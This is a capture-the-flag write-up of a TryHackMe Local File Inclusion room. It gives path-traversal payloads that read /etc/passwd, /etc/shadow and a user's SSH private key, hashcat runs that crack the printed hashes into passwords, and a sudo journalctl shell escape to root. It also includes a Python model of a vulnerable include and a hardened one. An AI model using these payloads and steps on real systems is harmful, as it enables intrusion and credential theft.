TryHackMe-LFI
Abdullah Rizwan | 09:21 AM , 4th November ,2020
LFI
Local File Inclusion (LFI) is a vulnerability mostly found in web servers. It is exploited when user input contains a path to a file that may be present on the server, and that file is included in the output. This kind of vulnerability can be used to read files containing sensitive and confidential data from the vulnerable system.
The main cause of this type of vulnerability is improper sanitization of the user's input. Sanitization here means that any user input should be checked to make sure that only the expected values are passed and nothing suspicious is given as input. It is a type of vulnerability commonly found in PHP-based websites but is not restricted to them.
Testing for LFI
To test for LFI, what we need is a parameter in a URL or in any other input field, such as the request body. For example, if the website is tryhackme.com then a parameter in the URL can look like https://tryhackme.com/?file=robots.txt. Here file is the name of the parameter and robots.txt is the value that we are passing (include the file robots.txt).
Importance of Arbitrary file reading
A lot of the time LFI can lead to accessing (without the proper permissions) important and classified data. An attacker can use LFI to read files from your system which can give away sensitive information such as passwords or SSH keys; the enumerated data can then be used to compromise the system further.
In this task, we are going to find the parameter which is vulnerable to the Local File Inclusion attack. We will then try to leverage the information obtained to get access to the system.
Once we find the vulnerable parameter we can try to include the passwd file on the Linux system, i.e. /etc/passwd. The most common technique is the path traversal method: we include a path like ../../../../etc/passwd, where each ../ steps out of a directory, just as running cd ../ does on a Linux system.
../../etc/passwd means go up twice from the current working directory, then go into the /etc directory and read the passwd file. The issue with this method is that you need to be sure about the path of the file.
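As an added example (not from the room or this writeup), here is a minimal model in Python, since the target runs Werkzeug, of the include pattern behind a parameter like page, next to a hardened version that resolves the final path and refuses anything outside the web root. The web root and the file one level above it are constructed in a temporary directory; the hypothetical secret.txt stands in for a file such as /etc/passwd.

```python
import os
import tempfile


def make_sample_site():
    """Constructed layout: <tmp>/www is the web root and <tmp>/secret.txt sits
    one directory above it, standing in for a sensitive file like /etc/passwd."""
    outer = tempfile.mkdtemp(prefix="lfi-demo-")
    web_root = os.path.join(outer, "www")
    os.mkdir(web_root)
    with open(os.path.join(web_root, "index.html"), "w") as f:
        f.write("<h1>Shop</h1>")
    secret = os.path.join(outer, "secret.txt")
    with open(secret, "w") as f:
        f.write("falcon:x:1000:1000")  # constructed sample content
    return web_root, secret


def vulnerable_include(web_root, page):
    """The pattern behind an unsanitised ?page= parameter: the value is joined
    straight onto the web root, so every ../ walks one directory upwards."""
    with open(os.path.join(web_root, page)) as f:
        return f.read()


def safe_include(web_root, page):
    """Hardened version: resolve the final path (symlinks and .. included) and
    only open it if it is still inside the web root. commonpath is used instead
    of startswith so that a sibling directory like www-old is not accepted."""
    root = os.path.realpath(web_root)
    target = os.path.realpath(os.path.join(root, page))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError(f"path traversal blocked: {page!r}")
    with open(target) as f:
        return f.read()


def traversal_blocked(web_root, page):
    """True if the hardened include rejects the given page value."""
    try:
        safe_include(web_root, page)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    web_root, _ = make_sample_site()
    print(vulnerable_include(web_root, "../secret.txt"))  # leaks the file above the root
    print(traversal_blocked(web_root, "../secret.txt"))   # True
```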
NMAP
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:b9:f0:d3:e4:b3:17:9c:7f:b6:7d:28:72:8a:e4:77 (RSA)
| 256 07:f2:d9:85:77:74:52:2a:73:76:70:35:73:70:c3:9e (ECDSA)
|_ 256 23:ba:e8:b6:8b:a2:ac:58:3b:f4:04:dc:6e:36:b7:f2 (ED25519)
80/tcp open http Werkzeug httpd 0.16.1 (Python 3.6.9)
|_http-title: Shop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
PORT 80
On visiting the web page
Try to navigate to different pages, and we see a parameter named page.
The basic traversal for /etc/passwd in LFI is ../../../../etc/passwd, but in this scenario ../../../etc/passwd is where the LFI exists.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
falcon:x:1000:1000:falcon,,,:/home/falcon:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
Now the room tells us to read user falcon's private SSH key.
Replacing /etc/passwd with /home/falcon/.ssh/id_rsa, the path becomes ../../../home/falcon/.ssh/id_rsa and we can get the key.
It is better to look at it through the page source.
Copy it into a new file, save it as id_rsa and change its permissions with chmod 600.
Logging in with SSH keeps failing because it needs his password, so let's grab /etc/shadow to see his hash and crack it, by going to ../../../etc/shadow.
Hashcat
Use hashcat to crack the sha512 hash. I came to know that it's sha512 by looking at the format of it.
hashcat -h | grep sha512
21000 | BitShares v0.x - sha512(sha512_bin(pass)) | Raw Hash
1710 | sha512($pass.$salt) | Raw Hash, Salted and/or Iterated
1720 | sha512($salt.$pass) | Raw Hash, Salted and/or Iterated
1740 | sha512($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated
1730 | sha512(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated
20200 | Python passlib pbkdf2-sha512 | Generic KDF
6500 | AIX {ssha512} | Operating System
1800 | sha512crypt $6$, SHA512 (Unix) | Operating System
21600 | Web2py pbkdf2-sha512 | Framework
root@kali:~# hashcat -a 0 --user -m 1800 ^C
root@kali:~# cd TryHackMe/Easy/LFI
root@kali:~/TryHackMe/Easy/LFI# hashcat -a 0 --user -m 1800 hash /usr/share/wordlists/rockyou.txt
Here --user tells hashcat that your hash line contains a username field, so you want it to be ignored. After waiting for some time it will show you this output:
$6$xQmTDVmT$hgSLG3ebs.8Tc/F4qqXNnvBBnG736EWpWKaprFVARjAsZ6JyoL4WaJdGv5.qddMWF4/MoJgN6Hekri8wyJ97k/:password09
Session..........: hashcat
Status...........: Cracked
Hash.Name........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: $6$xQmTDVmT$hgSLG3ebs.8Tc/F4qqXNnvBBnG736EWpWKaprFV...yJ97k/
Time.Started.....: Wed Nov 4 09:45:38 2020 (30 secs)
Time.Estimated...: Wed Nov 4 09:46:08 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 625 H/s (12.84ms) @ Accel:16 Loops:512 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 18752/14344385 (0.13%)
Rejected.........: 0/18752 (0.00%)
Restore.Point....: 18688/14344385 (0.13%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4608-5000
Candidates.#1....: soldado -> ladeda
In order to show the password:
root@kali:~/TryHackMe/Easy/LFI# hashcat -a 0 --user --show -m 1800 hash /usr/share/wordlists/rockyou.txt
falcon:$6$xQmTDVmT$hgSLG3ebs.8Tc/F4qqXNnvBBnG736EWpWKaprFVARjAsZ6JyoL4WaJdGv5.qddMWF4/MoJgN6Hekri8wyJ97k/:password09
Now we can log in to the box.
Running sudo -l to check what we can run as sudo:
falcon@walk:~$ sudo -l
Matching Defaults entries for falcon on walk:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User falcon may run the following commands on walk:
(root) NOPASSWD: /bin/journalctl
falcon@walk:~$
We can get the user flag:
drwxr-xr-x 5 falcon falcon 4096 Jan 30 2020 .
drwxr-xr-x 3 root root 4096 Jan 28 2020 ..
lrwxrwxrwx 1 root root 9 Jan 30 2020 .bash_history -> /dev/null
-rw-r--r-- 1 falcon falcon 220 Jan 28 2020 .bash_logout
-rw-r--r-- 1 falcon falcon 3771 Jan 28 2020 .bashrc
drwx------ 2 falcon falcon 4096 Jan 28 2020 .cache
drwx------ 3 falcon falcon 4096 Jan 28 2020 .gnupg
-rw------- 1 root root 36 Jan 29 2020 .lesshst
-rw-r--r-- 1 falcon falcon 807 Jan 28 2020 .profile
drwxr-xr-x 2 root root 4096 Jan 29 2020 .ssh
-rw-r--r-- 1 falcon falcon 0 Jan 29 2020 .sudo_as_admin_successful
-rw-r--r-- 1 falcon falcon 21 Jan 29 2020 user.txt
falcon@walk:~$ cat user.txt
B8LEGIF049JT4RTVWUG4
On visiting GTFOBins, we might be able to escalate privileges.
Privilege Escalation
Jan 28 19:00:21 walk kernel: x86/fpu: Supporting XSAVE feature 0x002: 'SSE registers'
Jan 28 19:00:21 walk kernel: x86/fpu: Supporting XSAVE feature 0x004: 'AVX registers'
Jan 28 19:00:21 walk kernel: x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256
Jan 28 19:00:21 walk kernel: x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' form
Jan 28 19:00:21 walk kernel: e820: BIOS-provided physical RAM map:
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x0000000000100000-0x000000003ffeffff] usable
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x000000003fff0000-0x000000003fffffff] ACPI data
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff] reserved
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x00000000fee00000-0x00000000fee00fff] reserved
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved
Jan 28 19:00:21 walk kernel: NX (Execute Disable) protection: active
Jan 28 19:00:21 walk kernel: random: fast init done
Jan 28 19:00:21 walk kernel: SMBIOS 2.5 present.
Jan 28 19:00:21 walk kernel: DMI: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
Jan 28 19:00:21 walk kernel: Hypervisor detected: KVM
Jan 28 19:00:21 walk kernel: e820: update [mem 0x00000000-0x00000fff] usable ==> reserved
!/bin/bash
root@walk:~# whoami
root
root@walk:~# id
uid=0(root) gid=0(root) groups=0(root)
root@walk:~#
You could also priv esc by cracking root's password hash:
root:$6$UVbVpBq4$O8f/Nk488RT95VcJpLl0WgwOuguU6kCRBVE3EHGHFviJJV9MNfb0GbK38WryIkx72d/DKh3HBprBYTcNJf0Xn0:hacking
And we are root! We could have also read the root and user flags through LFI, but it's better this way.